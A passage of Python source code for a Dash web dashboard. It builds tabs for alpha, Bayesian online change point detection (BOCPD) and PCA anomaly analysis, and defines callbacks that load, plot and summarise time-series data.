            # Info modal; opened/closed by the AlphasModal-Open/Close buttons.
            dbc.Modal(
                children = [
                    dbc.ModalHeader("Alpha anaylsis info"),
                    dbc.ModalBody(ModalText),
                    dbc.ModalFooter(
                        dbc.Button("Close", id="AlphasModal-Close", className="ModalButton")
                    ),
                ],
                size="lg",
                scrollable=True,
                id="AlphasModal",
            ),
            # Window bounds followed by statistics of the alpha series.
            html.P(["Highlighted region statistics;"],className="Header-text"),
            html.P(["t",html.Sub("0")," = %s" % (t0)],className="Para-text"),
            html.P(["t",html.Sub("1")," = %s" % (t1)],className="Para-text"),
            html.H3(["Alpha window anaylsis plots"],className="Header-text"),
            html.P(["Alpha statistics;"],className="Header-text"),
            html.P(["\u00B5(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s" % (AlphaParameters["Mean"])],className="Para-text"),
            html.P(["\u03C3(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s" % (AlphaParameters["STD"])],className="Para-text"),
            html.P(["min(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s" % (AlphaParameters["Min"])],className="Para-text"),
            html.P(["max(x[t",html.Sub("0"),":t",html.Sub("1"),"]) = %s" % (AlphaParameters["Max"])],className="Para-text"),
            # Info button that opens the modal above.
            dbc.Button(
                html.Span( html.Img(src="assets"+os.sep+"info.png", className="ButtonImg")),
                id="AlphasModal-Open", className="ButtonInfo"
            ),
        ],
        id="AlphasTable",
    )
def build_tab3(DefaultFeature, DefaultErrSize, DefaultDataType, DefaultRescale):
    '''
    Return the tab element of the Alpha graphs tab.
    Parameters:
        DefaultFeature (str): Default search string
        DefaultErrSize (float): Error scaling factor
        DefaultDataType (str): "Raw", "Alpha" or "BOCPD"
        DefaultRescale (float): "Norm", Plot as raw, "Rescale", plot mean centered features
    Returns:
        Div (html.Div): Built Tab
    '''
    offset = 1  # NOTE(review): unused in this builder
    sizegraph = 8  # graph column width (of 12); summary column gets the rest
    TabName = "Alphas"  # prefix for all component ids on this tab
    return html.Div(
        children=[
            # Loading spinners tied to this tab's callbacks.
            Spinner("Spinner-tab3-A"),
            Spinner("Spinner-tab3-B"),
            Spinner("Spinner-tab3-C"),
            Spinner("Spinner-tab3-D"),
            #Placeholders
            # Hidden H1s used as data stores shuttled between callbacks.
            html.Div(
                style={'display': 'none'},
                children = [
                    html.H1(
                        id="RawDirect",
                        children='data'+os.sep+'RawData',
                    ),
                    html.H1(
                        id="AlphasDirect",
                        children='data'+os.sep+'AlphaData',
                    ),
                    html.H1(
                        id='AlphasRawData',
                        children="0",
                    ),
                    html.H1(
                        id=TabName+'Data',
                        children="0",
                    ),
                    html.H1(
                        id=TabName+'DataSummary',
                        children=json.dumps(CalcStats.CalcStatsEmpty()),
                    ),
                    html.H1(
                        id=TabName+'AlphasDataSummary',
                        children=json.dumps(CalcStats.CalcAlphaStatsEmpty()),
                    ),
                ]
            ),
            dbc.Row(
                children = [
                    #First column
                    # Summary panel plus the "Run All" batch-process controls.
                    dbc.Col(
                        children = [
                            dbc.Row(
                                build_Alphasdatasummary(CalcStats.CalcStatsEmpty(), CalcStats.CalcAlphaStatsEmpty()),
                                className="graphContainer",
                            ),
                            dbc.Row(
                                build_Process("Alphas"),
                                className="graphContainer",
                            ),
                        ],
                        width=12-sizegraph,
                        className = "Cols",
                    ),
                    #Second column
                    # Controls row plus the alpha-series and raw-series graphs.
                    dbc.Col(
                        children = [
                            dbc.Row(
                                children = [
                                    dbc.Col(
                                        children=[
                                            dcc.Dropdown(
                                                id=TabName+'ColName-dropdown',
                                                multi=False,
                                                placeholder="Select a variable",
                                                style = {"overflow-y":"scroll", "height":SearchHeight},
                                            ),
                                        ],
                                        width={"size":6, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        children=[
                                            dcc.Input(
                                                id=TabName+'StrSearch',
                                                type="text",
                                                value=DefaultFeature,
                                                placeholder="String Search",
                                                style={'width': "100px"},
                                            ),
                                        ],
                                        width={"size":2, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        children=[
                                            dcc.Input(
                                                id=TabName+'SigNum',
                                                type="number",
                                                value=DefaultErrSize,
                                                min=0,
                                                placeholder="Error multiplier",
                                                style={'width': "100px"},
                                            ),
                                        ],
                                        width={"size":2, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        children=[
                                            dbc.Button(
                                                id=TabName+'Run',
                                                className="Button",
                                                children="Run",
                                                style={"width":"80px"},
                                            ),
                                        ],
                                        width={"size":1, "offset": 0},
                                        className = "Cols",
                                    ),
                                ],
                                className = "Rows",
                            ),
                            dbc.Row(
                                children = [
                                    build_graph("AlphasGraph", FigHeightPX/2),
                                ],
                                className = "Rows",
                            ),
                            dbc.Row(
                                children = [
                                    build_graph("AlphasRawGraph", FigHeightPX/2),
                                ],
                                className = "Rows",
                            ),
                        ],
                        width=sizegraph,
                        className = "Cols",
                    )
                ], className= "Rows"
            ),
        ]
    )
#######################
# Tab 4: BOCPD
#######################
def build_BOCPDdatasummary(Parameters, BOCPDStats):
    '''
    Return the key stats summary to left of figures
    Parameters:
        Parameters (dict): dictionary of statistics over the highlighted region about raw data
        BOCPDStats (dict): dictionary of statistics over the highlighted region about BOCPD
    Returns:
        Div (html.Div): Formated left column containing data.
    '''
    # "N/A" mean marks the empty-stats sentinel; only convert bounds when
    # real statistics are present.
    if Parameters["Mean"] != "N/A":
        t0 = Misc.unixToDatetime(Parameters["Start"])
        t1 = Misc.unixToDatetime(Parameters["End"])
    else:
        t0 = "N/A"
        t1 = "N/A"
    # Help text displayed in the pop-up info modal (interpolates the
    # module-level BOCPD error scale).
    ModalText = [
        html.P(["Bayesian Online Change Point detection. A probabilistic analysis on a live sequence of data which returns a likely-hood that points belong to the previous sequence of points given a prior. Here we've assumed a Gaussian prior with an errors scaled up-to %s sigma. The colour map is scaled logarithmically, hovering over the graph will show the sequence length and likely-hood. The red line show's the most likely sequence length, clicking will highlight the lower plot to show the data contained in this sequence. Select the single feature using the dropdown menu and click run. Alternatively click run in the lower section to run on all files in data\RawData and files will save in data\BOCPDdata." % BOCPD_errsScale],className="Header-text"),
    ]
    return html.Div(
        children = [
            # Info modal; opened/closed by the BOCPDModal-Open/Close buttons.
            dbc.Modal(
                children = [
                    dbc.ModalHeader("BOCPD info"),
                    dbc.ModalBody(ModalText),
                    dbc.ModalFooter(
                        dbc.Button("Close", id="BOCPDModal-Close", className="ModalButton")
                    ),
                ],
                size="lg",
                scrollable=True,
                id="BOCPDModal",
            ),
            # Window bounds followed by sequence-length summary statistics.
            html.H3(["BOCPD anaylsis plots"],className="Header-text"),
            html.P(["Highlighted region statistics;"],className="Header-text"),
            html.P(["t",html.Sub("0")," = %s" % (t0)],className="Para-text"),
            html.P(["t",html.Sub("1")," = %s" % (t1)],className="Para-text"),
            html.P(["t",html.Sub("0"),"-t", html.Sub("1"),"=%s days" % (Parameters["Duration"])],className="Para-text"),
            html.P(["BOCPD overview"], className="Header-text"),
            html.P(["max(l) = %s" % (BOCPDStats["MaxSeq"])],className="Para-text"),
            html.P(["\u00B5(l) = %s" % (BOCPDStats["MeanSeq"])],className="Para-text"),
            html.P(["N(l=0) = %s" % (BOCPDStats["NoZeros"])],className="Para-text"),
            # Info button that opens the modal above.
            dbc.Button(
                html.Span( html.Img(src="assets"+os.sep+"info.png", className="ButtonImg")),
                id="BOCPDModal-Open", className="ButtonInfo"
            ),
        ],
        id="BOCPDTable",
    )
def build_tab4(DefaultFeature, DefaultErrSize, DefaultDataType, DefaultRescale):
    '''
    Return the tab element of the BOCPD graphs tab.
    Parameters:
        DefaultFeature (str): Default search string
        DefaultErrSize (float): Error scaling factor
        DefaultDataType (str): "Raw", "Alpha" or "BOCPD"
        DefaultRescale (float): "Norm", Plot as raw, "Rescale", plot mean centered features
    Returns:
        Div (html.Div): Built Tab
    '''
    offset = 1  # NOTE(review): unused in this builder - presumably kept for symmetry with other tabs; confirm
    # Right-hand graph column spans `sizegraph` grid units; the summary column takes the rest.
    sizegraph = 8
    # Prefix used to namespace all component ids belonging to this tab.
    TabName = "BOCPD"
    return html.Div(
        children=[
            Spinner("Spinner-tab4-A"),
            Spinner("Spinner-tab4-B"),
            Spinner("Spinner-tab4-C"),
            Spinner("Spinner-tab4-D"),
            #Placeholders
            # Hidden H1 elements act as in-browser data stores shared between
            # callbacks (directories, cached JSON data and summary stats).
            # NOTE(review): id "RawDirect" is also created by other tab builders -
            # Dash forbids duplicate ids when both tabs render; confirm only one
            # tab's content is mounted at a time.
            html.Div(
                style={'display': 'none'},
                children = [
                    html.H1(
                        id="RawDirect",
                        children='data'+os.sep+'RawData',
                    ),
                    html.H1(
                        id="BOCPDDirect",
                        children='data'+os.sep+'BOCPDData',
                    ),
                    html.H1(
                        id=TabName+'RawData',
                        children="0",
                    ),
                    html.H1(
                        id=TabName+'Data',
                        children="0",
                    ),
                    html.H1(
                        id=TabName+'DataSummary',
                        children=json.dumps(CalcStats.CalcStatsEmpty()),
                    ),
                    html.H1(
                        id=TabName+'BOCPDDataSummary',
                        children=json.dumps(CalcStats.CalcBOCPDStatsEmpty())
                    ),
                ],
            ),
            dbc.Row(
                children = [
                    #First column
                    # Summary statistics panel plus the "run all" progress controls.
                    dbc.Col(
                        children = [
                            dbc.Row(
                                build_BOCPDdatasummary(CalcStats.CalcStatsEmpty(), CalcStats.CalcBOCPDStatsEmpty()),
                                className="graphContainer",
                            ),
                            dbc.Row(
                                build_Process("BOCPD"),
                                className="graphContainer",
                            ),
                        ],
                        width=12-sizegraph,
                        className = "Cols",
                    ),
                    #Second column
                    # Feature selection controls on top, BOCPD heat map and the
                    # raw-data plot underneath.
                    dbc.Col(
                        children = [
                            dbc.Row(
                                children = [
                                    dbc.Col(
                                        children=[
                                            dcc.Dropdown(
                                                id=TabName+'ColName-dropdown',
                                                multi=False,
                                                placeholder="Select a variable",
                                                style = {"overflow-y":"scroll", "height":SearchHeight},
                                            ),
                                        ],
                                        width={"size":6, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        children=[
                                            dcc.Input(
                                                id=TabName+'StrSearch',
                                                type="text",
                                                value=DefaultFeature,
                                                placeholder="String Search",
                                                style={'width': "100px"},
                                            ),
                                        ],
                                        width={"size":1, "offset": 0},
                                        className = "Cols",
                                    ),
                                    # Empty spacer column.
                                    dbc.Col(
                                        children=[
                                            html.Div()
                                        ],
                                        width={"size":3, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        children=[
                                            dbc.Button(
                                                id=TabName+'Run',
                                                className="Button",
                                                children="Run",
                                                style={"width":"80px"},
                                            ),
                                        ],
                                        width={"size":1, "offset": 0},
                                        className = "Cols",
                                    ),
                                ],
                                className = "Rows",
                            ),
                            dbc.Row(
                                children = [
                                    build_graph("BOCPDGraph", FigHeightPX/2),
                                ],
                                className = "Rows",
                            ),
                            dbc.Row(
                                children = [
                                    build_graph("BOCPDRawGraph", FigHeightPX/2),
                                ],
                                className = "Rows",
                            ),
                        ],
                        width=sizegraph,
                        className = "Cols",
                    )
                ], className = "Rows",
            )
        ]
    )
#######################
# Tab 5: PCA
#######################
def build_PCAdatasummary(Parameters, PCAStats):
    '''
    Return the key stats summary to left of figures.
    Parameters:
        Parameters (dict): dictionary of statistics over the highlighted region about raw data
        PCAStats (dict): dictionary of statistics over the highlighted region about PCA fit
    Returns:
        Div (html.Div): Formatted left column containing data.
    '''
    # "N/A" mean means no region is highlighted yet; propagate the placeholder.
    if Parameters["Mean"] != "N/A":
        t0 = Misc.unixToDatetime(Parameters["Start"])
        t1 = Misc.unixToDatetime(Parameters["End"])
    else:
        t0 = "N/A"
        t1 = "N/A"
    # Help text shown in the info modal. (Typo fixes: "flaged" -> "flagged",
    # "it's" -> "its".)
    ModalText = [
        html.P(["Select the desired features using the string search or dropdown menu. A rolling PCA window has been deployed to calculate two key \
        statistics. The T squared statistic, a metric of how well fitted the PCA model is to the new data point and the Q statistic a metric of how well \
        understood the residuals are to the model. Both of which are good indicators of anomalies. Any values exceeding a confidence limit on the model \
        will be flagged (yellow) and these contribute to the rolling rate which is plotted in the top plot. The bottom plot shows the PCA transformed \
        features. A dropdown menu at the bottom will plot one of the features alone and its marginalised rate. Key statistics \
        are displayed on the left."],className="Header-text"),
    ]
    return html.Div([
            dbc.Modal(
                children = [
                    dbc.ModalHeader("PCA info"),
                    dbc.ModalBody(ModalText),
                    dbc.ModalFooter(
                        dbc.Button("Close", id="PCAModal-Close", className="ModalButton")
                    ),
                ],
                size="lg",
                scrollable=True,
                id="PCAModal",
            ),
            # Typo fix in the heading: "anaylsis" -> "analysis".
            html.H3(["PCA analysis plots"],className="Header-text"),
            html.P(["Highlighted region statistics;"],className="Header-text"),
            html.P(["t",html.Sub("0")," = %s" % (t0)],className="Para-text"),
            html.P(["t",html.Sub("1")," = %s" % (t1)],className="Para-text"),
            html.P(["t",html.Sub("0"),"-t", html.Sub("1"),"=%s days" % (Parameters["Duration"])],className="Para-text"),
            html.P(["PCA overview"], className="Header-text"),
            html.P(["NPCA = %s" % (PCAStats["NPCA"])],className="Para-text"),
            html.P(["NRisk = %s" % (PCAStats["NRegions"])],className="Para-text"),
            html.P(["\u00B5(\u03BB",html.Sub(":NPCA"),") = %s" % (PCAStats["VarianceFracs"])],className="Para-text"),
            html.P(["\u00B5(T",html.Sup("2"),") = %s" % (PCAStats["TsMean"])],className="Para-text"),
            html.P(["\u00B5(Q) = %s" % (PCAStats["QsMean"])],className="Para-text"),
            dbc.Button(
                html.Span( html.Img(src="assets"+os.sep+"info.png", className="ButtonImg")),
                id="PCAModal-Open", className="ButtonInfo"
            ),
        ],
        id="PCATable",
    )
def build_tab5(DefaultFeature, DefaultErrSize, DefaultDataType, DefaultRescale):
    '''
    Return the tab element of the PCA graphs tab.
    Parameters:
        DefaultFeature (str): Default search string
        DefaultErrSize (float): Error scaling factor
        DefaultDataType (str): "Raw", "Alpha" or "BOCPD"
        DefaultRescale (float): "Norm", Plot as raw, "Rescale", plot mean centered features
    Returns:
        Div (html.Div): Built Tab
    '''
    offset = 1  # NOTE(review): unused in this builder - presumably kept for symmetry with other tabs; confirm
    # Right-hand graph column spans `sizegraph` grid units; the summary column takes the rest.
    sizegraph = 8
    # Prefix used to namespace all component ids belonging to this tab.
    TabName = "PCA"
    return html.Div(
        children=[
            Spinner("Spinner-tab5-A"),
            Spinner("Spinner-tab5-B"),
            Spinner("Spinner-tab5-C"),
            Spinner("Spinner-tab5-D"),
            #Placeholders
            # Hidden H1 elements act as in-browser data stores shared between
            # callbacks. NOTE(review): ids "RawDirect" and "DataSummary" are not
            # prefixed with TabName and may clash with other tabs' components if
            # both are ever mounted simultaneously - confirm.
            html.Div(
                style={'display': 'none'},
                children = [
                    html.H1(
                        id="RawDirect",
                        children='data'+os.sep+'RawData',
                    ),
                    html.H1(
                        id=TabName+'RawData',
                        children="0",
                    ),
                    html.H1(
                        id=TabName+'Data',
                        children="0",
                    ),
                    html.H1(
                        id=TabName+'TsData',
                        children="0",
                    ),
                    html.H1(
                        id=TabName+'QsData',
                        children="0",
                    ),
                    html.H1(
                        id='DataSummary',
                        children=json.dumps(CalcStats.CalcStatsEmpty()),
                    ),
                    html.H1(
                        id=TabName+'DataSummary',
                        children=json.dumps(CalcStats.CalcPCAStatsEmpty())
                    ),
                ],
            ),
            dbc.Row(
                children = [
                    #First column
                    # Summary statistics panel.
                    dbc.Col(
                        children = [
                            dbc.Row(
                                build_PCAdatasummary(CalcStats.CalcStatsEmpty(), CalcStats.CalcPCAStatsEmpty()),
                                className="graphContainer",
                            ),
                        ],
                        width=12-sizegraph,
                        className = "Cols",
                    ),
                    #Second column
                    # Feature/type selection controls on top, rates and PCA plots
                    # underneath, marginal-feature dropdown at the bottom.
                    dbc.Col(
                        children = [
                            dbc.Row(
                                children = [
                                    # NOTE(review): width "size" 0 looks like a degenerate
                                    # spacer column - confirm intended.
                                    dbc.Col(
                                        children=[
                                            html.Div()
                                        ],
                                        width={"size":0, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        children=[
                                            dcc.Dropdown(
                                                id=TabName+'ColName-dropdown',
                                                multi=True,
                                                placeholder="Select a variable",
                                                style = {"overflow-y":"scroll", "height":SearchHeight},
                                            ),
                                        ],
                                        width={"size":6, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        children=[
                                            dcc.Input(
                                                id=TabName+'StrSearch',
                                                type="text",
                                                value=DefaultFeature,
                                                placeholder="String Search",
                                                style={'width': "100px"},
                                            ),
                                        ],
                                        width={"size":2, "offset": 0},
                                        className = "Cols",
                                    ),
                                    # Choice of which data stream feeds the PCA model.
                                    dbc.Col(
                                        dcc.RadioItems(
                                            id=TabName+'TypeSelect',
                                            options=[
                                                {'label': 'Raw ', 'value': 'Raw'},
                                                {'label': 'Alpha ', 'value': 'Alpha'},
                                                {'label': 'BOCPD ', 'value': 'BOCPD'},
                                            ],
                                            value=DefaultDataType,
                                            labelStyle={'display': 'inline'}
                                        ),
                                        width={"size":2, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        children=[
                                            dbc.Button(
                                                id=TabName+'Run',
                                                className="Button",
                                                children="Run",
                                                style={"width":"80px"},
                                            ),
                                        ],
                                        width={"size":1, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        children=[
                                            html.Div()
                                        ],
                                        width={"size":1, "offset": 0},
                                        className = "Cols",
                                    ),
                                ],
                                className = "Rows",
                            ),
                            dbc.Row(
                                children = [
                                    build_graph("RatesGraph", int(2*FigHeightPX/3)),
                                ],
                                className = "Rows",
                            ),
                            dbc.Row(
                                children = [
                                    build_graph("PCAGraph", int(FigHeightPX/3))
                                ],
                                className = "Rows",
                            ),
                            dbc.Row(
                                children = [
                                    dbc.Col(
                                        children=[
                                            html.Div()
                                        ],
                                        width={"size":1, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        children=[
                                            dcc.Dropdown(
                                                id=TabName+'TestFeature-dropdown',
                                                multi=False,
                                                placeholder="Select a marginal variable",
                                            ),
                                        ],
                                        width={"size":10, "offset": 0},
                                        className = "Cols",
                                    ),
                                    dbc.Col(
                                        children=[
                                            html.Div()
                                        ],
                                        width={"size":1, "offset": 0},
                                        className = "Cols",
                                    ),
                                ],className = "Rows",
                            ),
                        ],
                        width=sizegraph,
                        className = "Cols",
                    )
                ], className = "Rows",
            )
        ]
    )
################################################################################################################
# Bootstrap Style sheet and run.
################################################################################################################
# Bootstrap 4 CSS pulled from the CDN; no additional JavaScript bundles are used.
external_stylesheets = [
    {
        "href": "https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css",
        "rel": "stylesheet",
    },
]
external_scripts=[]
# Create the Dash application instance; `app.title` sets the browser tab title.
app = dash.Dash(__name__, external_stylesheets=external_stylesheets, external_scripts=external_scripts)
app.title = "Dashboard Analysis"
################################################################################################################
# Layout
################################################################################################################
app.layout = html.Div(
    #The main part of the code defining the application dashboard calling all the individual elements.
    id="big-app-container",
    className="big-app-container",
    children=[
        #Initial info splash screen
        dbc.Modal(
            children = [
                dbc.ModalBody(dcc.Markdown(text_markdown)),
                dbc.ModalFooter(
                    dbc.Button("Close", id="DashboardModal-Close", className="ModalButton")
                ),
            ],
            is_open = True,
            scrollable=True,
            id="DashboardModal",
            size="xl",
            className="Modal",
        ),
        #Banner
        build_banner(),
        #Refresh intervals: small drives the runtime clock, mid drives progress
        #bars, big is for slow periodic refreshes.
        Intervals(dt_small, "intervalSmall"),
        Intervals(dt_mid, "intervalMid"),
        Intervals(dt_big, "intervalBig"),
        #General placeholder values (hidden components that callbacks target)
        html.Div(
            children = [
                html.H1(
                    children=0,
                    id="JSON_Cache_Output",
                ),
                dbc.Button(
                    children=0,
                    id="DashboardModal-Open",
                ),
            ],
            style={'display': 'none'},
        ),
        #Tab elements
        html.Div(
            html.Div(
                id="app-container",className="app-container",
                children=[
                    Spinner("Spinner-tabs"),
                    build_tabs(),
                    html.Div(id='tabs-content'),
                ],
            ), className="box",
        ),
        #Runtime clock, refreshed every second by the update_runtime callback.
        # BUG FIX: the %-formatting was previously trapped inside the string
        # literal (mismatched quotes), so the raw template text was displayed;
        # format the initial value properly instead.
        html.H5(children = ['Total runtime: %02dh:%02dm:%02ds' % (0, 0, 0)], id="RuntimePrint", style = { 'color':'black'}),
    ]
)
################################################################################################################
# Callbacks
################################################################################################################
#######################
# Modals
#######################
# Register open/close toggling for every info modal. Each modal follows the
# naming convention "<Name>Modal" / "<Name>Modal-Open" / "<Name>Modal-Close",
# so a single loop wires all of them to the shared toggle_modal helper instead
# of six copy-pasted registrations (Dashboard, Raw, Fourier, Alphas, BOCPD, PCA).
for _modal_name in ("Dashboard", "Raw", "Fourier", "Alphas", "BOCPD", "PCA"):
    app.callback(
        Output("%sModal" % _modal_name, "is_open"),
        [Input("%sModal-Open" % _modal_name, "n_clicks"), Input("%sModal-Close" % _modal_name, "n_clicks")],
        [State("%sModal" % _modal_name, "is_open")]
    )(toggle_modal)
#######################
# Server time
#######################
@app.callback(Output("RuntimePrint", 'children'),
[Input('intervalSmall', 'n_intervals'),Input('intervalSmall', 'interval')])
def update_runtime(timetot, interval):
    '''
    Display the local server connection runtime.
    Parameters:
        timetot (float): number of interval ticks elapsed
        interval (float): interval pulse duration in milliseconds
    Returns:
        Time (str): Run time in formatted string
    '''
    # Each tick represents `interval` milliseconds; convert to seconds first.
    elapsed_seconds = timetot * (interval / 1000)
    hours, remainder = divmod(elapsed_seconds, 3600)
    minutes, seconds = divmod(remainder, 60)
    return 'Total runtime: %02dh:%02dm:%02ds' % (hours, minutes, seconds)
#######################
# Tabs
#######################
# Update tab selection.
@app.callback([Output('tabs-content', 'children'),Output("Spinner-tabs", "children")],
    [Input('tabs', 'value')],
    )
def render_tab_content(tab):
    '''
    Update rendered tab
    Parameters:
        tab (string): tab ID tab-x
    Returns:
        Div (html.Div): html.Div of build tab
    '''
    # Dispatch table instead of an if/elif chain; every builder shares the
    # same signature. An unknown tab id falls through (implicit None), exactly
    # as the original chain did.
    builders = {
        'tab-1': build_tab1,
        'tab-2': build_tab2,
        'tab-3': build_tab3,
        'tab-4': build_tab4,
        'tab-5': build_tab5,
    }
    if tab in builders:
        return builders[tab](DefaultFeature, DefaultErrSize, DefaultDataType, DefaultRescale), ""
################################################################################################################
# Callbacks Tab 1:
################################################################################################################
#######################
# Dropdowns
#######################
@app.callback(
    [Output('RawColName-dropdown','options'),Output('RawColName-dropdown','value')],
    [Input('RawStrSearch', "value")],
    [State('RawDirect','children')],
)
def update_dropdowns(StrSearch, RawDir):
    '''
    Update options for dropdown element for variables in Raw graphs
    Parameters:
        StrSearch (float): Key substring to index files by
        RawDir (float): Files directory
    Returns:
        Dropdowns (options): List of possible dropdowns
        Value (value): Initial selected value
    '''
    # Remember the latest search string for newly-built tabs.
    global DefaultFeature
    DefaultFeature = StrSearch
    available = DatM.GlobDirectory(RawDir)
    matches = Misc.PatternsList(StrSearch, available)
    if matches:
        # Pre-select all matches (this dropdown accepts multiple values).
        selected, initial = matches, matches
    else:
        # No match: offer every file but select nothing.
        selected, initial = available, None
    options = [{'label':"Variable: %s" % (name), 'value':name} for name in selected]
    return options, initial
#######################
# Sliders
#######################
# Wire the Raw date-range slider to the shared DateSlider helper, which derives
# min/max/value/marks from the currently loaded data store.
app.callback(
    [Output('RawRangeSlider','min'),Output('RawRangeSlider','max'),Output('RawRangeSlider','value'),Output('RawRangeSlider','marks')],
    [Input('RawData','children')]
)(DateSlider)
#######################
# Load Data
#######################
@app.callback(
[Output('RawData', 'children'),Output('RawDataError', 'children')],
[Input('RawDirect','children'), Input('RawColName-dropdown', 'value')],
)
def update_data(RawDir, Features):
    '''
    Update raw graph data
    Parameters:
        RawDir (float): Files directory
        Features (list): List of features to be loaded
    Returns:
        data (json): Jsonified data
        error (json): Jsonified errors
    '''
    # Guard clauses: nothing selected yet, or too many features requested.
    if Features in [None, "None"]:
        return 0, 0
    if len(Features) > 6:
        return 0, 0
    loaded, errors = DatM.PCALOAD(RawDir, Features)
    # Nothing sensible to plot.
    if loaded.empty:
        return 0, 0
    return loaded.to_json(date_format='iso', orient='split'), errors.to_json(date_format='iso', orient='split')
#######################
# Raw Plots
#######################
@app.callback(
    [Output('RawGraph', 'figure'),Output("RawDataSummary","children")],
    [Input('RawData','children'), Input('RawDataError', 'children'), Input('RawRangeSlider','value'), Input("RawSigNum","value"), Input("RawNormed","value")]
)
def update_graph(jsonified_data,jsonified_err,value, sig, Norm):
    '''
    Update raw graph selected
    Parameters:
        jsonified_data (json): Jsonified data
        jsonified_error (json): Jsonified errors
        value ([float,float]): Slider positions
        sig (float): Error scaling factor
        Norm (str): "Norm" or "Rescaled". If to mean center plots
    Returns:
        Fig (dcc.Graph) : Figure element
        JSON (json) : jsonified summary data for display
    '''
    global DefaultRescale
    DefaultRescale = Norm
    if jsonified_data not in [0,"0", None, "None"]:
        startval = Misc.unixToDatetime(value[0])
        endval = Misc.unixToDatetime(value[1]+1)
        #Un json data
        data = pd.read_json(jsonified_data, orient='split')
        err = pd.read_json(jsonified_err, orient='split')
        #Remove Timezone info that read_json puts in
        data.index = data.index.tz_localize(None)
        # BUG FIX: the original called tz_localize(None) on data.index a second
        # time; after the line above that index is already tz-naive, and pandas
        # raises TypeError when localizing a naive index. Localize err's own
        # index instead.
        err.index = err.index.tz_localize(None)
        Data_i_Name = data.columns[0]
        # Statistics of interest over the slider-highlighted window.
        WindowParameters = CalcStats.CalcStats(data[startval:endval])
        # NOTE(review): if Norm is neither "None" nor "Rescaled" (the docstring
        # mentions "Norm"), Fig is never assigned and this raises
        # UnboundLocalError - confirm the radio item's actual values.
        if Norm == "None":
            Fig = DashPlots.CreateRawFigStacked(data, err, sig, data.columns, WindowParameters, FigHeightPX)
        if Norm == "Rescaled":
            # Mean-center each feature before plotting.
            Fig = DashPlots.CreateRawFigStacked(data.transform(lambda x: x-x.mean()), err, sig, data.columns, WindowParameters, FigHeightPX)
        if SaveFigs == 1:
            # Render a matplotlib copy to disk in a separate process.
            XRange = [data.index[0],data.index[-1]]
            YRange = [None,None]
            NameDate = "_%s_%s" % (XRange[0].strftime("%d%m%Y"),XRange[1].strftime("%d%m%Y"))
            p1 = Process(target=Graphing.plotMATPLOTLIB, args=[[data.index],[data[Data_i_Name].values], [None],XRange,YRange,"linear", "linear", [], [], "Time, t", Data_i_Name, [""], ["black"],["-"],"cachefiles"+os.sep+"Raw",Data_i_Name+NameDate,True])
            p1.start()
            p1.join()
        return Fig, json.dumps(WindowParameters)
    else:
        return DashPlots.EmptyFig(FigHeightPX), json.dumps(CalcStats.CalcStatsEmpty())
#######################
# Summary Stats
#######################
@app.callback(
    Output('RawTable', 'children'),
    [Input("RawDataSummary","children")]
)
def update_Summary(Parameters):
    '''
    Load parameters into the summary column.
    Parameters:
        Parameters (json): Parameters summarising Raw data
    Returns:
        Dict (dict): Parameters summarising Raw data
    '''
    # Decode the JSON store and hand it straight to the layout builder.
    return build_rawdatasummary(json.loads(Parameters))
################################################################################################################
# Callbacks Tab 2:
################################################################################################################
#######################
# Dropdowns
#######################
@app.callback(
    [Output('FourierColName-dropdown','options'),Output('FourierColName-dropdown','value')],
    [Input('FourierStrSearch', "value")],
    [State('RawDirect','children')],
)
def update_dropdowns(StrSearch, RawDir):
    '''
    Update options for dropdown element for variables in Raw graphs
    Parameters:
        StrSearch (float): Key substring to index files by
        RawDir (float): Files directory
    Returns:
        Dropdowns (options): List of possible dropdowns
        Value (value): Initial selected value
    '''
    # Remember the latest search string for newly-built tabs.
    global DefaultFeature
    DefaultFeature = StrSearch
    available = DatM.GlobDirectory(RawDir)
    matches = Misc.PatternsList(StrSearch, available)
    if matches:
        # Single-select dropdown: pre-select the first match only.
        selected, initial = matches, matches[0]
    else:
        selected, initial = available, None
    options = [{'label':"Variable: %s" % (name), 'value':name} for name in selected]
    return options, initial
#######################
# Sliders
#######################
# Wire the Fourier date-range slider to the shared DateSlider helper, which
# derives min/max/value/marks from the currently loaded data store.
app.callback( [Output('FourierRangeSlider','min'),Output('FourierRangeSlider','max'),Output('FourierRangeSlider','value'),Output('FourierRangeSlider','marks')],
    [Input('FourierData','children')]
)(DateSlider)
#######################
# Update data
#######################
# Load the selected feature's raw data via the shared LoadDataAfterDropdowns helper.
app.callback(
    Output('FourierData', 'children'),
    [Input('RawDirect','children'), Input('FourierColName-dropdown', 'value')]
)(LoadDataAfterDropdowns)
#######################
# Raw Plots
#######################
@app.callback(
    [Output('FourierRawGraph', 'figure'),Output("FourierDataSummary","children")],
    [Input('FourierData','children'), Input('FourierRangeSlider','value'),Input("FourierSigNum", "value")],
)
def update_graph(jsonified_data, value, sig):
    '''
    Update Fourier Raw graph
    Parameters:
        jsonified_data (json): Jsonified data
        value ([float,float]): Slider positions
        sig (float): Error scaling factor
    Returns:
        Fig (dcc.Graph) : Figure element
        JSON (json) : jsonified summary data for display
    '''
    # Guard clause: no data loaded yet -> empty figure and empty summary.
    if jsonified_data in [0, "0", None, "None"]:
        return DashPlots.EmptyFig(FigHeightPX/2), json.dumps(CalcStats.CalcStatsEmpty())
    window_start = Misc.unixToDatetime(value[0])
    window_end = Misc.unixToDatetime(value[1])
    # Decode the JSON store and strip the timezone info read_json adds.
    frame = pd.read_json(jsonified_data, orient='split')
    frame.index = frame.index.tz_localize(None)
    feature = frame.columns[0]
    # Statistics over the slider-highlighted window.
    window_stats = CalcStats.CalcStats(frame[window_start:window_end][feature])
    figure = DashPlots.CreateRawFig(frame, sig, feature, window_stats, FigHeightPX/2)
    return figure, json.dumps(window_stats)
@app.callback(
